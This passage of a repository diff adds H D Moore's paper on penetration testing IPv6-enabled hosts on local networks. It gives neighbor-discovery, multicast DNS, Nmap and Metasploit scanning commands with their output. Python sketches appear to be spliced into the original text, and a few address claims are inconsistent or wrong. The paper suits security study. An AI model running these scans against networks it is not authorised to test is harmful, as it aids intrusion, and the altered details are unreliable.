[4] ivanlef0u. You failed (blog entry about KeUsermodeCallback function in French).
|
||||
http://www.ivanlef0u.tuxfamily.org/?p=68
|
||||
|
||||
[5] Microsoft Corporation. About Dynamic Data Exchange.
|
||||
http://msdn.microsoft.com/en-us/library/ms648774.aspx
|
||||
|
||||
[6] Microsoft Corporation. DDE Support in Internet Explorer Versions (still supported in ie7).
|
||||
http://support.microsoft.com/kb/160957
|
||||
|
||||
[7] Wikipedia. Integer overflow.
|
||||
http://en.wikipedia.org/wiki/Integer_overflow
|
||||
|
||||
[8] mxatone and ivanlef0u. Stealth hooking : Another way to subvert the Windows kernel.
|
||||
http://www.phrack.org/issues.html?issue=65&id=4#article
|
||||
|
||||
[9] Kostya Kortchinsky. Kernel pool exploitation (Syscan Hong Kong 2008).
|
||||
http://www.syscan.org/hk/indexhk.html
|
||||
|
||||
[10] Ruben Santamarta. Exploiting common flaws in drivers.
|
||||
http://www.reversemode.com/index.php?option=com_remository&Itemid=2&func=fileinfo&id=51
|
||||
|
||||
[11] Ruben Santamarta. Exploit for win32k!ntUserFnOUTSTRING (MS08-25/n).
|
||||
http://www.reversemode.com/index.php?option=com_content&task=view&id=50&Itemid=1
|
||||
|
||||
[12] Microsoft Corporation. MS08-025: Win32k vulnerabilities.
|
||||
http://blogs.technet.com/swi/archive/2008/04/09/ms08-025-win32k-vulnerabilities.aspx
|
||||
|
||||
[13] Cesar Cerrudo. Microsoft Windows kernel GDI local privilege escalation.
|
||||
http://projects.info-pull.com/mokb/MOKB-06-11-2006.html
|
||||
|
||||
[14] Microsoft Corporation. Steve Lipner and Michael Howard. The Trustworthy Computing Security Development Lifecycle
|
||||
http://msdn.microsoft.com/en-us/library/ms995349.aspx
|
484
uninformed/10.4.txt
Normal file
|
@ -0,0 +1,484 @@
|
|||
Exploiting Tomorrow's Internet Today: Penetration testing with IPv6
|
||||
10/2008
|
||||
H D Moore
|
||||
hdm@metasploit.com
|
||||
|
||||
Abstract: This paper illustrates how IPv6-enabled systems with link-local and
|
||||
auto-configured addresses can be compromised using existing security tools.
|
||||
While most of the techniques described can apply to "real" IPv6 networks, the
|
||||
focus of this paper is to target IPv6-enabled systems on the local network.
|
||||
|
||||
Acknowledgments: The author would like to thank Van Hauser of THC for his
|
||||
excellent presentation at CanSecWest 2005 and for releasing the IPv6 Attack
|
||||
Toolkit. Much of the background information in this paper is based on notes
|
||||
from Van Hauser's presentation. The 'alive6' tool included with the IPv6
|
||||
Attack Toolkit is the critical first step for all techniques described in this
|
||||
paper. The author would like to thank Philippe Biondi for his work on SCAPY
|
||||
and for his non-traditional 3-D presentation on IPv6 routing headers at
|
||||
CanSecWest 2007.
|
||||
|
||||
1) Introduction
|
||||
|
||||
The next iteration of the IP protocol, version 6, has been "just around the
|
||||
corner" for nearly 10 years. Migration deadlines have come and gone,
|
||||
networking vendors have added support, and all modern operating systems are
|
||||
IPv6-ready. The problem is that few organizations have any intention of
|
||||
implementing IPv6. The result is that most corporate networks contain machines
|
||||
that have IPv6 networking stacks, but have not been intentionally configured
|
||||
with IPv6. The IPv6 stack represents an attack surface that is often
|
||||
overlooked in corporate environments. For example, many firewall products,
|
||||
such as ZoneAlarm on Windows and the standard IPTables on Linux, do not block
|
||||
IPv6 traffic (IPTables can, but it uses Netfilter6 rules instead). The goal of
|
||||
this paper is to demonstrate how existing tools can be used to compromise IPv6
|
||||
enabled systems.
|
||||
|
||||
1.2) Operating System
|
||||
|
||||
All tools described in this paper were launched from an Ubuntu Linux 8.04
|
||||
system. If you are using Microsoft Windows, Mac OS X, BSD, or another Linux
|
||||
distribution, some tools may work differently or not at all.
|
||||
|
||||
1.3) Configuration
|
||||
|
||||
All examples in this paper depend on the host system having a valid IPv6 stack
|
||||
along with a link-local or auto-configured IPv6 address. This requires the
|
||||
IPv6 functionality to be compiled into the kernel or loaded from a kernel
|
||||
module. To determine if your system has an IPv6 address configured for a
|
||||
particular interface, use the ifconfig command:
|
||||
|
||||
# ifconfig eth0 | grep inet6
|
||||
inet6 addr: fe80::0102:03ff:fe04:0506/64 Scope:Link
|
||||
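The same check can be scripted. The sketch below is an illustration rather than part of the original toolset: it assumes a Linux host, where the kernel lists configured IPv6 addresses in /proc/net/if_inet6 as six whitespace-separated fields (address as 32 hex digits, interface index, prefix length, scope, flags, interface name). The function name parse_if_inet6 and the sample text are hypothetical.

```python
import ipaddress

# Sample text in the assumed /proc/net/if_inet6 layout. The second entry is
# the link-local address from the ifconfig output above.
SAMPLE = (
    "00000000000000000000000000000001 01 80 10 80       lo\n"
    "fe80000000000000010203fffe040506 02 40 20 80     eth0\n"
)


def parse_if_inet6(text):
    """Return (interface, address, prefix_length) tuples from if_inet6 text."""
    entries = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue  # skip anything that does not match the assumed layout
        raw, _index, prefix_len, _scope, _flags, name = fields
        address = ipaddress.IPv6Address(bytes.fromhex(raw))
        # The prefix length is stored in hexadecimal (0x40 == 64).
        entries.append((name, address, int(prefix_len, 16)))
    return entries


for name, address, prefix_len in parse_if_inet6(SAMPLE):
    kind = "link-local" if address.is_link_local else "other"
    print(f"{name}: {address}/{prefix_len} ({kind})")
```

On a live Linux system the text would come from reading /proc/net/if_inet6 instead of the sample string.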
|
||||
1.4) Addressing
|
||||
|
||||
IPv6 addresses consist of 128 bits (16 bytes) and are represented as eight groups
|
||||
of four hex digits separated by colons. A set of two colons ("::") indicates
|
||||
that the bits leading up to the next part of the address should be all zero.
|
||||
For example, the IP address for the loopback/localhost consists of 15 NULL
|
||||
bytes followed by one byte set to the value of 0x01. The representation for
|
||||
this address is simply "::1" (IPv4 127.0.0.1). The "any" IPv6 address is
|
||||
represented as "::0" or just "::" (IPv4 0.0.0.0). In the case of link-local
|
||||
addresses, the prefix is always "fe80::" followed by the EUI-64 formatted MAC
|
||||
address, while auto-configured addresses always have the prefix of "2000::".
|
||||
The "::" sequence can only be used once within an IPv6 address (it would be
|
||||
ambiguous otherwise). The following examples demonstrate how the "::" sequence
|
||||
is used.
|
||||
|
||||
0000:0000:0000:0000:0000:0000:0000:0000 == ::, ::0, 0::0, 0:0::0:0
|
||||
0000:0000:0000:0000:0000:0000:0000:0001 == ::1, 0::1, 0:0::0:0001
|
||||
fe80:0000:0000:0000:0000:0000:0000:0060 == fe80::60
|
||||
fe80:0000:0000:0000:0102:0304:0506:0708 == fe80::0102:0304:0506:0708
|
||||
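The equivalences listed above can be checked with Python's standard ipaddress module. This is a small sketch for experimenting with the "::" notation; the helper names same_address and is_valid are ours, not part of any tool discussed in this paper.

```python
import ipaddress

# Fully expanded address -> shorthand forms taken from the table above.
EXAMPLES = {
    "0000:0000:0000:0000:0000:0000:0000:0000": ["::", "::0", "0::0", "0:0::0:0"],
    "0000:0000:0000:0000:0000:0000:0000:0001": ["::1", "0::1", "0:0::0:0001"],
    "fe80:0000:0000:0000:0000:0000:0000:0060": ["fe80::60"],
    "fe80:0000:0000:0000:0102:0304:0506:0708": ["fe80::0102:0304:0506:0708"],
}


def same_address(full, short):
    """True when both strings parse to the same 128-bit address."""
    return ipaddress.IPv6Address(full) == ipaddress.IPv6Address(short)


def is_valid(text):
    """True when the string is a well-formed IPv6 address."""
    try:
        ipaddress.IPv6Address(text)
        return True
    except ipaddress.AddressValueError:
        return False


for full, shorts in EXAMPLES.items():
    for short in shorts:
        assert same_address(full, short)
    # .compressed prints the shortest form, .exploded the full form.
    print(full, "->", ipaddress.IPv6Address(full).compressed)

# A second "::" makes the address ambiguous, so the parser rejects it.
print(is_valid("fe80::1::2"))
```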
|
||||
1.5) Link-local vs Site-local
|
||||
|
||||
On a given local network, all IPv6 nodes have at least one link-local address
|
||||
(fe80::). During the automatic configuration of IPv6 for a network adapter, a
|
||||
link-local address is chosen, and an IPv6 router discovery request is sent to
|
||||
the all-routers broadcast address. If any IPv6-enabled router responds, the
|
||||
node will also choose a site-local address for that interface (2000::). The
|
||||
router response indicates whether to use DHCPv6 or the EUI-64 algorithm to
|
||||
choose a site-local address. On networks where there are no active IPv6
|
||||
routers, an attacker can reply to the router discovery request and force all
|
||||
local IPv6 nodes to configure a site-local address.
|
||||
|
||||
2) Discovery
|
||||
|
||||
2.1) Scanning
|
||||
|
||||
Unlike the IPv4 address space, it is not feasible to sequentially probe IPv6
|
||||
addresses in order to discover live systems. In real deployments, it is common
|
||||
for each endpoint to receive a 64-bit network range. Inside that range, only
|
||||
one or two active nodes may exist, but the address space is over four
|
||||
billion times the size of the entire IPv4 Internet. Trying to discover live
|
||||
systems with sequential probes within a 64-bit IP range would require at
|
||||
least 18,446,744,073,709,551,616 packets.
|
||||
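To put these numbers in perspective, the arithmetic can be worked through in a few lines of Python. The probe rate of one million packets per second is an assumption chosen for illustration, not a measured figure.

```python
HOST_BITS = 64   # size of the host portion of a typical IPv6 subnet
IPV4_BITS = 32   # size of the entire IPv4 address space

addresses_per_subnet = 2 ** HOST_BITS
ipv4_internet = 2 ** IPV4_BITS

# How many complete IPv4 Internets fit into a single 64-bit subnet.
ratio = addresses_per_subnet // ipv4_internet

# Assumed probe rate (hypothetical): one million packets per second.
PROBES_PER_SECOND = 1_000_000
SECONDS_PER_YEAR = 365 * 24 * 60 * 60

years = addresses_per_subnet / PROBES_PER_SECOND / SECONDS_PER_YEAR

print(f"addresses in one /64: {addresses_per_subnet:,}")
print(f"IPv4 Internets per /64: {ratio:,}")
print(f"years to probe sequentially: {years:,.0f}")
```

Even at that rate, a sequential sweep of one subnet takes hundreds of thousands of years, which is why the rest of this section relies on local discovery instead.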
|
||||
2.2) Management
|
||||
|
||||
In order to manage hosts within large IPv6 network ranges, DNS and other
|
||||
naming services are absolutely required. Administrators may be able to
|
||||
remember an IPv4 address within a subnet, but tracking a 64-bit host ID within
|
||||
a local subnet is a challenge. Because of this requirement, DNS, WINS, and
|
||||
other name services are critical for managing the addresses of IPv6 hosts.
|
||||
Since the focus of this paper is on "accidental" IPv6 networks, we will not be
|
||||
covering IPv6 discovery through host management services.
|
||||
|
||||
2.3) Neighbor Discovery
|
||||
|
||||
The IPv4 ARP protocol goes away in IPv6. Its replacement consists of the
|
||||
ICMPv6 Neighbor Discovery (ND) and ICMPv6 Neighbor Solicitation (NS)
|
||||
protocols. Neighbor Discovery allows an IPv6 host to discover the link-local
|
||||
and auto-configured addresses of all other IPv6 systems on the local network.
|
||||
Neighbor Solicitation is used to determine if a given IPv6 address exists on
|
||||
the local subnet. The link-local address is guaranteed to be unique per-host,
|
||||
per-link, by picking an address generated by the EUI-64 algorithm. This
|
||||
algorithm uses the network adapter MAC address to generate a unique IPv6
|
||||
address. For example, a system with a hardware MAC of 01:02:03:04:05:06 would
use a link-local address of fe80::0302:03FF:FE04:0506. The eight-byte interface
identifier is created by taking the first three bytes of the MAC, appending
FF:FE and then the last three bytes of the MAC, and inverting the
universal/local bit (0x02) of the first byte, which is why a MAC starting with
00:11:43 yields an address containing 0211:43ff. In addition to link-local addresses, IPv6
|
||||
also supports stateless auto-configuration. Stateless auto-configured
|
||||
addresses use the "2000::" prefix. More information about Neighbor Discovery
|
||||
can be found in RFC 2461.
|
||||
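The address derivation can be sketched in Python as follows. The function name mac_to_link_local is hypothetical. The sketch follows the modified EUI-64 convention, which also inverts the universal/local bit (0x02) of the first MAC byte; this matches the 'ip neigh' output shown later in this paper, where a MAC beginning with 00:11:43 maps to fe80::211:43ff.

```python
import ipaddress


def mac_to_link_local(mac):
    """Derive the fe80::/64 link-local address for a colon-separated MAC."""
    octets = bytearray(int(part, 16) for part in mac.split(":"))
    if len(octets) != 6:
        raise ValueError("expected a six-byte MAC address")
    # Modified EUI-64: invert the universal/local bit of the first byte.
    octets[0] ^= 0x02
    # Insert FF:FE between the first and last three bytes of the MAC.
    interface_id = bytes(octets[:3]) + b"\xff\xfe" + bytes(octets[3:])
    # fe80 followed by 48 zero bits, then the 64-bit interface identifier.
    return ipaddress.IPv6Address(b"\xfe\x80" + b"\x00" * 6 + interface_id)


print(mac_to_link_local("00:11:43:aa:bb:cc"))
print(mac_to_link_local("01:02:03:04:05:06"))
```

Given a MAC address learned from another source (a switch table or an ARP cache, for example), this gives a candidate IPv6 address to probe directly.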
|
||||
2.4) The IPv6 Attack Toolkit
|
||||
|
||||
In order to enumerate local hosts using the Neighbor Discovery protocol, we
|
||||
need a tool which can send ICMPv6 probes and listen for responses. The alive6
|
||||
program included with Van Hauser's IPv6 Attack Toolkit is the tool for the
|
||||
job. The example below demonstrates how to use alive6 to discover IPv6 hosts
|
||||
attached to the network on the eth0 interface.
|
||||
|
||||
# alive6 eth0
|
||||
Alive: fe80:0000:0000:0000:xxxx:xxff:fexx:xxxx
|
||||
Alive: fe80:0000:0000:0000:yyyy:yyff:feyy:yyyy
|
||||
Found 2 systems alive
|
||||
|
||||
2.5) Linux Neighbor Discovery Tools
|
||||
|
||||
The 'ip' command, in conjunction with 'ping6', both included with many recent
|
||||
Linux distributions, can also be used to perform local IPv6 node discovery.
|
||||
The following commands demonstrate this method:
|
||||
|
||||
# ping6 -c 3 -I eth0 ff02::1 >/dev/null 2>&1
|
||||
# ip neigh | grep ^fe80
|
||||
fe80::211:43ff:fexx:xxxx dev eth0 lladdr 00:11:43:xx:xx:xx REACHABLE
|
||||
fe80::21e:c9ff:fexx:xxxx dev eth0 lladdr 00:1e:c9:xx:xx:xx REACHABLE
|
||||
fe80::218:8bff:fexx:xxxx dev eth0 lladdr 00:18:8b:xx:xx:xx REACHABLE
|
||||
[...]
|
||||
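When many hosts respond, it helps to turn this output into a target list. The sketch below parses text in the shape of the 'ip neigh' output above and builds address%interface strings suitable for the scanners discussed later. The function names and the sample MAC addresses are made up for illustration, and the parser only assumes the "dev" and "lladdr" keywords seen in that output.

```python
# Sample text shaped like the output above; the hosts are hypothetical.
SAMPLE_OUTPUT = """\
fe80::211:43ff:fe00:1 dev eth0 lladdr 00:11:43:00:00:01 REACHABLE
fe80::21e:c9ff:fe00:2 dev eth0 lladdr 00:1e:c9:00:00:02 router STALE
192.168.0.1 dev eth0 lladdr 00:18:8b:00:00:03 REACHABLE
fe80::218:8bff:fe00:4 dev eth0  FAILED
"""


def parse_ip_neigh(output):
    """Return one dict per link-local neighbor entry."""
    neighbors = []
    for line in output.splitlines():
        tokens = line.split()
        if not tokens or not tokens[0].lower().startswith("fe80"):
            continue  # same filter as "grep ^fe80"
        entry = {"address": tokens[0], "state": tokens[-1]}
        for key in ("dev", "lladdr"):
            if key in tokens:
                index = tokens.index(key)
                if index + 1 < len(tokens):
                    entry[key] = tokens[index + 1]
        neighbors.append(entry)
    return neighbors


def scan_targets(neighbors):
    """Build address%interface strings for entries with a known device."""
    return [f"{n['address']}%{n['dev']}" for n in neighbors if "dev" in n]


for target in scan_targets(parse_ip_neigh(SAMPLE_OUTPUT)):
    print(target)
```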
|
||||
2.6) Local Broadcast Addresses
|
||||
|
||||
IPv6 Neighbor Discovery relies on a set of special broadcast (strictly, multicast) addresses in
|
||||
order to reach all local nodes of a given type. The table below enumerates the
|
||||
most useful of these addresses.
|
||||
|
||||
- FF01::1 = This address reaches all node-local IPv6 nodes
|
||||
- FF02::1 = This address reaches all link-local IPv6 nodes
|
||||
- FF05::1 = This address reaches all site-local IPv6 nodes
|
||||
- FF01::2 = This address reaches all node-local IPv6 routers
|
||||
- FF02::2 = This address reaches all link-local IPv6 routers
|
||||
- FF05::2 = This address reaches all site-local IPv6 routers
|
||||
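The pattern in this list is regular enough to decode programmatically: the low four bits of the second byte carry the scope (1, 2, or 5 here) and the final group selects all nodes (1) or all routers (2). The following sketch uses Python's ipaddress module; the describe function and the two lookup tables are our own names and cover only the addresses listed above.

```python
import ipaddress

# Scope and group values limited to those that appear in the list above.
SCOPES = {0x1: "node-local", 0x2: "link-local", 0x5: "site-local"}
GROUPS = {1: "all nodes", 2: "all routers"}


def describe(address_text):
    """Return (scope, group) for one of the well-known ffXX:: addresses."""
    address = ipaddress.IPv6Address(address_text)
    if not address.is_multicast:
        raise ValueError(f"{address} is not in ff00::/8")
    scope = address.packed[1] & 0x0F              # low nibble of second byte
    group = int.from_bytes(address.packed[2:], "big")
    return SCOPES.get(scope, "other"), GROUPS.get(group, "other")


for text in ("FF01::1", "FF02::1", "FF05::1", "FF01::2", "FF02::2", "FF05::2"):
    scope, group = describe(text)
    print(f"{text}: {group}, {scope}")
```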
|
||||
2.7) IPv4 vs IPv6 Broadcasts
|
||||
|
||||
The IPv4 protocol allowed packets destined to network broadcast addresses to
|
||||
be routed across the Internet. While this had some legitimate uses, this
|
||||
feature was abused for years by traffic amplification attacks, which spoofed a
|
||||
query to a broadcast address from a victim in order to saturate the victim's
|
||||
bandwidth with the responses. While some IPv4 services were designed to work
|
||||
with broadcast addresses, this is the exception and not the norm. With the
|
||||
introduction of IPv6, broadcast addresses are no longer routed outside of the
|
||||
local network. This mitigates traffic amplification attacks, but also prevents
|
||||
a host from sending Neighbor Discovery probes into remote networks.
|
||||
|
||||
One of the major differences between IPv4 and IPv6 is how network services
|
||||
which listen on the "any" address (0.0.0.0 / ::0) handle incoming requests
|
||||
destined to the broadcast address. A good example of this is the BIND DNS
|
||||
server. When using IPv4 and listening to 0.0.0.0, DNS requests sent to the
|
||||
network broadcast address are simply ignored. When using IPv6 and listening to
|
||||
::0, DNS requests sent to the link-local all nodes broadcast address (FF02::1)
|
||||
are processed. This allows a local attacker to send a message to all BIND
|
||||
servers on the local network with a single packet. The same technique will
|
||||
work for any other UDP-based service bound to the ::0 address of an
|
||||
IPv6-enabled interface.
|
||||
|
||||
$ dig metasploit.com @FF02::1
|
||||
;; ANSWER SECTION:
|
||||
metasploit.com. 3600 IN A 216.75.15.231
|
||||
;; SERVER: fe80::xxxx:xxxx:xxxx:xxxx%2#53(ff02::1)
|
||||
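The dig example can be approximated with a short Python sketch that sends one DNS query to FF02::1 and collects every address that answers. This is an illustration under stated assumptions: the function names are ours, the interface name is supplied by the caller, the query is a plain recursive A-record request, and only the senders of any replies are recorded (the replies are not parsed).

```python
import socket
import struct


def build_dns_query(name, query_id=0x1234):
    """Build a minimal DNS query for an A record (class IN)."""
    # Header: ID, flags (recursion desired), 1 question, no other records.
    header = struct.pack(">HHHHHH", query_id, 0x0100, 1, 0, 0, 0)
    labels = b"".join(
        bytes([len(part)]) + part.encode("ascii")
        for part in name.rstrip(".").split(".")
    )
    question = labels + b"\x00" + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN
    return header + question


def query_all_nodes(name, interface, timeout=2.0):
    """Send one query to ff02::1 on the interface and list who replied."""
    scope_id = socket.if_nametoindex(interface)
    responders = []
    with socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        # IPv6 socket address: (host, port, flowinfo, scope_id).
        sock.sendto(build_dns_query(name), ("ff02::1", 53, 0, scope_id))
        while True:
            try:
                _data, sender = sock.recvfrom(4096)
            except socket.timeout:
                break
            responders.append(sender[0])
    return responders


# Example call (needs a real interface name, so it is left commented out):
# print(query_all_nodes("metasploit.com", "eth0"))
```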
|
||||
3) Services
|
||||
|
||||
3.1) Using Nmap
|
||||
|
||||
The Nmap port scanner has support for IPv6 targets; however, it can only scan
|
||||
these targets using the native networking libraries and does not have the
|
||||
ability to send raw IPv6 packets. This limits TCP port scans to the
|
||||
"connect()" method, which, while effective, is slow against firewalled hosts
|
||||
and requires a full TCP connection to identify each open port. Even with these
|
||||
limitations, Nmap is still the tool of choice for IPv6 port scanning. Older
|
||||
versions of Nmap did not support scanning link-local addresses, due to the
|
||||
requirement of an interface suffix. Trying to scan a link-local address would
|
||||
result in the following error.
|
||||
|
||||
# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx
|
||||
Starting Nmap 4.53 ( http://insecure.org ) at 2008-08-23 14:48 CDT
|
||||
Strange error from connect (22):Invalid argument
|
||||
|
||||
The problem is that link-local addresses are interface specific. In order to
|
||||
talk to the host at fe80::xxxx:xxxx:xxxx:xxxx, we must indicate which
|
||||
interface it is on as well. The way to do this on the Linux platform is by
|
||||
appending a "%" followed by the interface name to the address. In this case,
|
||||
we would specify "fe80::xxxx:xxxx:xxxx:xxxx%eth0". Recent versions of Nmap
|
||||
(4.68) now support the interface suffix and have no problem scanning
|
||||
link-local IPv6 addresses. Site-local addresses do not require a scope ID
|
||||
suffix, which makes them a little bit easier to use from an attacker's
|
||||
perspective (reverse connect code doesn't need to know the scope ID, just the
|
||||
address).
|
||||
|
||||
# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx%eth0
|
||||
Starting Nmap 4.68 ( http://nmap.org ) at 2008-08-27 13:57 CDT
|
||||
PORT STATE SERVICE
|
||||
22/tcp open ssh
|
||||
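The role of the interface suffix becomes clearer when the connect() method is written out by hand. The sketch below is not Nmap's implementation; it is a minimal connect-style scan in Python with hypothetical function names. It assumes a Linux host, where getaddrinfo() accepts the "%eth0" suffix and turns it into the numeric scope ID carried in the socket address.

```python
import socket


def split_scope(target):
    """Split 'address%interface' into (address, interface or None)."""
    address, _, zone = target.partition("%")
    return address, zone or None


def connect_scan(target, ports, timeout=1.0):
    """Return the ports on target that accept a full TCP connection."""
    open_ports = []
    for port in ports:
        # getaddrinfo resolves any %interface suffix into the scope ID
        # stored as the fourth element of the IPv6 socket address.
        infos = socket.getaddrinfo(
            target, port, socket.AF_INET6, socket.SOCK_STREAM
        )
        family, socktype, proto, _canonname, sockaddr = infos[0]
        with socket.socket(family, socktype, proto) as sock:
            sock.settimeout(timeout)
            if sock.connect_ex(sockaddr) == 0:
                open_ports.append(port)
    return open_ports


print(split_scope("fe80::24c:44ff:fe4f:1a44%eth0"))
# Example call (needs a reachable host, so it is left commented out):
# print(connect_scan("fe80::24c:44ff:fe4f:1a44%eth0", [22, 80, 135, 445]))
```

Without the suffix the scope ID is zero, and the kernel has no way to pick the outgoing link for a link-local destination, which is what produced the "Invalid argument" error shown earlier.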
|
||||
3.2) Using Metasploit
|
||||
|
||||
The development version of the Metasploit Framework includes a simple TCP port
|
||||
scanner. This module accepts a list of hosts via the RHOSTS parameter and a
|
||||
start and stop port. The Metasploit Framework has full support for IPv6
|
||||
addresses, including the interface suffix. The following example scans ports 1
|
||||
through 10,000 on the target fe80::xxxx:xxxx:xxxx:xxxx connected via interface
|
||||
eth0. This target is a default install of Vista Home Premium.
|
||||
|
||||
# msfconsole
|
||||
msf> use auxiliary/discovery/portscan/tcp
|
||||
msf auxiliary(tcp) > set RHOSTS fe80::xxxx:xxxx:xxxx:xxxx%eth0
|
||||
msf auxiliary(tcp) > set PORTSTART 1
|
||||
msf auxiliary(tcp) > set PORTSTOP 10000
|
||||
msf auxiliary(tcp) > run
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:135
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:445
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1025
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1026
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1027
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1028
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1029
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1040
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:3389
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:5357
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
In addition to TCP port scanning, the Metasploit Framework also includes a UDP
|
||||
service detection module. This module sends a series of UDP probes to every
|
||||
host defined by RHOSTS and prints out any responses received. This module
|
||||
works with any IPv6 address, including the broadcast. For example, the session
|
||||
below demonstrates discovery of a local DNS service that is listening on ::0
|
||||
and responds to requests for the link-local all nodes broadcast address.
|
||||
|
||||
# msfconsole
|
||||
msf> use auxiliary/scanner/discovery/sweep_udp
|
||||
msf auxiliary(sweep_udp) > set RHOSTS ff02::1
|
||||
msf auxiliary(sweep_udp) > run
|
||||
[*] Sending 7 probes to ff02:0000:0000:0000:0000:0000:0000:0001 (1 hosts)
|
||||
[*] Discovered DNS on fe80::xxxx:xxxx:xxxx:xxxx%eth0
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
4) Exploits
|
||||
|
||||
4.1) IPv6 Enabled Services
|
||||
|
||||
When conducting a penetration test against an IPv6 enabled system, the first
|
||||
step is to determine what services are accessible over IPv6. In the previous
|
||||
section, we described some of the tools available for doing this, but did not
|
||||
cover the differences between the IPv4 and IPv6 interfaces of the same
|
||||
machine. Consider the Nmap results below: the first set is from scanning the
|
||||
IPv6 interface of a Windows 2003 system, while the second is from scanning the
|
||||
same system's IPv4 address.
|
||||
|
||||
# nmap -6 -p1-10000 -n fe80::24c:44ff:fe4f:1a44%eth0
|
||||
80/tcp open http
|
||||
135/tcp open msrpc
|
||||
445/tcp open microsoft-ds
|
||||
554/tcp open rtsp
|
||||
1025/tcp open NFS-or-IIS
|
||||
1026/tcp open LSA-or-nterm
|
||||
1027/tcp open IIS
|
||||
1030/tcp open iad1
|
||||
1032/tcp open iad3
|
||||
1034/tcp open unknown
|
||||
1035/tcp open unknown
|
||||
1036/tcp open unknown
|
||||
1755/tcp open wms
|
||||
9464/tcp open unknown
|
||||
# nmap -sS -p1-10000 -n 192.168.0.147
|
||||
25/tcp open smtp
|
||||
42/tcp open nameserver
|
||||
53/tcp open domain
|
||||
80/tcp open http
|
||||
110/tcp open pop3
|
||||
135/tcp open msrpc
|
||||
139/tcp open netbios-ssn
|
||||
445/tcp open microsoft-ds
|
||||
554/tcp open rtsp
|
||||
1025/tcp open NFS-or-IIS
|
||||
1026/tcp open LSA-or-nterm
|
||||
1027/tcp open IIS
|
||||
1030/tcp open iad1
|
||||
1032/tcp open iad3
|
||||
1034/tcp open unknown
|
||||
1035/tcp open unknown
|
||||
1036/tcp open unknown
|
||||
1755/tcp open wms
|
||||
3389/tcp open ms-term-serv
|
||||
9464/tcp open unknown
|
||||
|
||||
Of the services provided by IIS, only the web server and streaming media
|
||||
services appear to be IPv6 enabled. The SMTP, WINS, DNS, POP3, NetBIOS, and RDP
|
||||
services were all missing from our scan of the IPv6 address. While this does
|
||||
limit the attack surface on the IPv6 interface, the remaining services are
|
||||
still significant in terms of exposure. The SMB port (445) allows access to
|
||||
file shares and remote API calls through DCERPC. All TCP DCERPC services are
|
||||
still available, including the endpoint mapper, which provides us with a list
|
||||
of DCERPC applications on this system. The web server (IIS 6.0) is accessible,
|
||||
along with any applications hosted on this system. The streaming media
|
||||
services RTSP (554) and MMS (1755) provide access to the streaming content and
|
||||
administrative interfaces.
|
||||
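With longer port lists, the comparison is easier to do mechanically. The sketch below copies the open ports from the two Nmap runs above into Python sets and computes the difference; the variable names are ours.

```python
# Open TCP ports reported by the two scans above.
ipv6_ports = {80, 135, 445, 554, 1025, 1026, 1027, 1030, 1032,
              1034, 1035, 1036, 1755, 9464}
ipv4_ports = {25, 42, 53, 80, 110, 135, 139, 445, 554, 1025, 1026, 1027,
              1030, 1032, 1034, 1035, 1036, 1755, 3389, 9464}

# Services reachable over IPv4 only.
ipv4_only = sorted(ipv4_ports - ipv6_ports)
# Services reachable over IPv6 only (none in this case).
ipv6_only = sorted(ipv6_ports - ipv4_ports)
# Services exposed on both protocols.
shared = sorted(ipv4_ports & ipv6_ports)

print("IPv4 only:", ipv4_only)
print("IPv6 only:", ipv6_only)
print("both:", shared)
```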
|
||||
4.2) IPv6 and Web Browsers
|
||||
|
||||
While most modern web browsers have support for IPv6 addresses within the URL
|
||||
bar, there are complications. For example, with the Windows 2003 system above,
|
||||
we see that port 80 is open. To access this web server with a browser, we use
|
||||
the following URL:
|
||||
|
||||
http://[fe80::24c:44ff:fe4f:1a44%eth0]/
|
||||
|
||||
Unfortunately, while Firefox and Konqueror can process this URL, Internet
|
||||
Explorer (6 and 7) cannot. Since this is a link-local address, DNS is not
|
||||
sufficient, because the local scope ID is not recognized in the URL. An
|
||||
interesting difference between Firefox 3 and Konqueror is how the Host header
|
||||
is created when specifying an IPv6 address and scope ID. With Firefox 3, the
|
||||
entire address, including the local scope ID is sent in the HTTP Host header.
|
||||
This causes IIS 6.0 to return an "invalid hostname" error back to the browser.
|
||||
However, Konqueror will strip the local scope ID from the Host header, which
|
||||
prevents IIS from throwing the error message seen by Firefox.
|
||||
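The Konqueror behavior is simple to reproduce when building requests by hand. The following sketch (the function name build_request is hypothetical) keeps the scope ID for the socket layer but drops it from the Host header, which is the form that, per the observation above, IIS 6.0 accepts.

```python
def build_request(target, path="/"):
    """Build an HTTP/1.1 GET request whose Host header omits the scope ID."""
    # "fe80::24c:44ff:fe4f:1a44%eth0" -> "fe80::24c:44ff:fe4f:1a44"
    address = target.partition("%")[0]
    request = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: [{address}]\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return request.encode("ascii")


print(build_request("fe80::24c:44ff:fe4f:1a44%eth0").decode("ascii"))
```

The full target string, including the scope ID, is still what gets passed to the connect call; only the header text changes.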
|
||||
4.3) IPv6 and Web Assessments
|
||||
|
||||
One of the challenges with assessing IPv6-enabled systems is making existing
|
||||
security tools work with the IPv6 address format (especially the local scope
|
||||
ID). For example, the Nikto web scanner is an excellent tool for web
|
||||
assessments, but it does not have direct support for IPv6 addresses. While we
|
||||
can add an entry to /etc/hosts for the IPv6 address we want to scan and pass
|
||||
